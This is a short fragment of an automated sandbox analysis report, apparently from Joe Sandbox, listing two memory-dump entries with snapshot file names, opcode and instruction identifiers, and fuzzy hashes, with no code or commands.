                                                                                                                                                                                          • Source File: 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                                                                                                                                          • Associated: 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_1225000_FBmz85HS0d.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d88654c433b18f8d22c873d2d192f74f6a81242adefeab7d9f9786e7d26e1ecc
                                                                                                                                                                                          • Instruction ID: 183f1e2a48562a92fd4cc9a358b3c6dac032f19f113a5b7977997a3a8cd53765
                                                                                                                                                                                          • Opcode Fuzzy Hash: d88654c433b18f8d22c873d2d192f74f6a81242adefeab7d9f9786e7d26e1ecc
                                                                                                                                                                                          • Instruction Fuzzy Hash: F091CCA281E3D1AFD71387744C6A6997F70AE1712471E86DBC8C5CF0A3E24D491ACB23
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                                                                                                                                          • Associated: 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_1225000_FBmz85HS0d.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d41eed63bc8547b786a7c47ea856caede47a5a1b194952ef98546cfc93356d16
                                                                                                                                                                                          • Instruction ID: 8803167b19d013bc4ecc4d3a7a599c3ab1dcbc9bd39a9b080bb4ed066d034554
                                                                                                                                                                                          • Opcode Fuzzy Hash: d41eed63bc8547b786a7c47ea856caede47a5a1b194952ef98546cfc93356d16
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FC1FC5145E3D12FD7278BB04D7A495BF74AD2311431E86CFC8C98F8A3D259990AE323